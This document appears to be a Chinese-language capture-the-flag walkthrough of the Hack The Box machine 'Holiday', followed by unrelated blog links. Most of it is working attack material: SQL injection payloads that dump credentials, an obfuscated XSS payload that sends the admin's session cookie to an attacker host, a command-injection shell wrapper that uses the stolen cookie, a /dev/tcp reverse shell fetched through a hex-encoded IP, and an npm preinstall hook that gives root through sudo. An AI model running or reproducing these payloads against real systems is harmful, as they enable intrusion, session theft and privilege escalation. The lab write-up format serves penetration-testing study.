[Meachines] [Hard] Holiday SQLI+XSS-Bypass+RCE-HEX-Shell+TRP00F+npm特權升級

Information Gathering

IP Address Opening Ports
10.10.10.25 TCP:22,8000

$ ip='10.10.10.25'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

bash 复制代码
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c3aa3dbd0e0146c96b4673f3d1bacef2 (RSA)
|   256 b567f5eb8d11e90fddf452259fb12f23 (ECDSA)
|_  256 79e97896c5a8f4028390583fe58dfa98 (ED25519)
8000/tcp open  http    Node.js Express framework
|_http-title: Error
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SQLI

http://10.10.10.25:8000/

$ dirsearch -u 'http://10.10.10.25:8000/'

http://10.10.10.25:8000/login

复制代码
POST /login HTTP/1.1
Host: 10.10.10.25:8000
Content-Length: 24
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.25:8000
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.10.25:8000/login
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

username=1x&password=1

username=x"--+&password=1

Error Occurred
username=x"))--+&password=1

Invalid User
username=x")) OR 1=1 --+&password=1

Incorrect Password
username=1")) ORDER BY 4 --+&password=1

字段為4

確認回顯位置

username=1")) UNION SELECT 88,99,66,67 --+&password=1

確認數據庫類型

username=1")) UNION SELECT 88,sqlite_version(),66,67 --+&password=1

Sqlite 3.15.0
username=1")) UNION SELECT 88,group_concat(name, ','),66,67 FROM sqlite_master WHERE type='table' --+&password=1

users,sqlite_sequence,notes,bookings,sessions

$ sqlmap -r /tmp/sql -T users,notes,sessions --dump --threads 10

复制代码
+----+--------+----------------------------------+----------+
| id | active | password                         | username |
+----+--------+----------------------------------+----------+
| 1  | 1      | fdc8cd4cff2c19e0d1022e78481ddf36 | RickA    |
+----+--------+----------------------------------+----------+

nevergonnagiveyouup

http://10.10.10.25:8000/agent

XSS Bypass

http://10.10.10.25:8000/vac/8dd841ff-3f44-4f2b-9324-9a833e2c6b65

所有備註都必須經過管理員審核 --- 此過程最多可能需要 1 分鐘。

js 复制代码
<img src='http://10.10.16.13:8090/SUCCESSFULLY' />
sh 复制代码
$ url="http://10.10.16.13:10000/1.js"
js="document.write('<script src=\"$url\"></script>');"
echo -n "$js" | od -An -t u1 | tr -d '\n' | sed 's| \+|,|g; s|^,||; s|^|<img src="/><script>eval(String.fromCharCode(|; s|$|))</script>"/>|'
JS 复制代码
window.addEventListener('DOMContentLoaded', function(e) {
    window.location = "http://10.10.16.13:10000/?cookie=" + encodeURI(document.getElementsByName("cookie")[0].value)
})
复制代码
connect.sid=s%3a98a88d30-27f1-11f0-ade9-71050c9a43af.4gmaIMgfX/Hym%2bqFylhAqwyx1QklsHSDYZlccAj0iF0

RCE && HEX Reverse Shell

http://10.10.10.25:8000/admin

http://10.10.10.25:8000/admin/export?table=.../

這似乎在在防止命令執行[a-z0-9&\s\/]

SH 复制代码
#!/bin/bash

 
urlencode() {
  python3 -c "import sys, urllib.parse; print(urllib.parse.quote(sys.argv[1]))" "$1"
}
while true; do
  echo -n "SHELL$ "
  read cmd
  if [[ "$cmd" == "exit" ]]; then
    break
  fi
  encoded_cmd=$(urlencode "$cmd")
  url="http://10.10.10.25:8000/admin/export?table=x%26${encoded_cmd}"
  curl "$url" \
    --cookie "connect.sid=s%3a98a88d30-27f1-11f0-ade9-71050c9a43af.4gmaIMgfX/Hym%2bqFylhAqwyx1QklsHSDYZlccAj0iF0" \
    -H 'Cache-Control: max-age=0' \
    -H 'Upgrade-Insecure-Requests: 1' \
    -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36' \
    -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
    -H 'Accept-Encoding: gzip, deflate' \
    -H 'Accept-Language: en-US,en;q=0.9' \
    --http1.1
done

$ ./exp.sh

sh 复制代码
#!/bin/bash

bash -i >& /dev/tcp/10.10.16.13/443 0>&1

將IP轉爲十六進制

$ printf '0x%02X%02X%02X%02X\n' $(echo 10.10.16.13 | tr '.' ' ') | tr 'A-F' 'a-f'

shell$ wget 0x0a0a100d/shell

SHELL$ bash shell

User.txt

79081c45597fb44319152df89b15934e

TRP00F

https://github.com/MartinxMax/trp00f

Privilege Escalation:npm

algernon@holiday:~$ sudo -l

創建/get/package.json

json 复制代码
{
  "name": "shell",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "/bin/bash"
  }
}

algernon@holiday:~$ sudo npm i ./get/ --unsafe

Root.txt

0bfed7171c81458d5d24175642c8c0b2

相关推荐
慧一居士21 分钟前
flex 布局完整功能介绍和示例演示
前端
DoraBigHead23 分钟前
小哆啦解题记——两数失踪事件
前端·算法·面试
一斤代码6 小时前
vue3 下载图片(标签内容可转图)
前端·javascript·vue
中微子6 小时前
React Router 源码深度剖析解决面试中的深层次问题
前端·react.js
光影少年6 小时前
从前端转go开发的学习路线
前端·学习·golang
中微子6 小时前
React Router 面试指南:从基础到实战
前端·react.js·前端框架
GuokLiu6 小时前
250708-Svelte项目从Debian迁移到无法联网的RHEL全流程指南
npm·svelte
3Katrina6 小时前
深入理解 useLayoutEffect:解决 UI "闪烁"问题的利器
前端·javascript·面试
前端_学习之路7 小时前
React--Fiber 架构
前端·react.js·架构
伍哥的传说8 小时前
React 实现五子棋人机对战小游戏
前端·javascript·react.js·前端框架·node.js·ecmascript·js